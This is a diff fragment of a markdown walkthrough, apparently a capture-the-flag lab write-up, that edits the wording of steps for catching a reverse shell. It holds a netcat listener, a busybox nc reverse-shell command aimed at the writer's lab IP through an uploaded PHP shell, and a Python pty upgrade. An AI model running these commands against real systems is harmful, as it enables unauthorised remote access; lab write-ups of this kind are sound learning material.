elleoma/elleoma.github.io/posts/en/environment/report.md

    rlwrap nc -lvnp 1337
    ```

-2. On our uploaded PHP cmd shell send any reverse shell pointing to us:
+2. On our uploaded PHP cmd shell send any reverse shell for linux system pointing to our IP:
    ```bash
    busybox nc 10.10.14.53 1337 -e sh
    ```

 ![image](imgs/revshell.png)

-3. I like to get a persistent interactive shell for reverse shell that won't drop connection after some time, so I'll use this set of commands to get one:
+3. I like to get a persistent interactive shell that won't drop connection after some time, so I'll use this set of commands after getting reverse connection on our machine:
    ```bash
    # After getting a reverse connection on netcat
    python3 -c 'import pty; pty.spawn("/bin/bash")'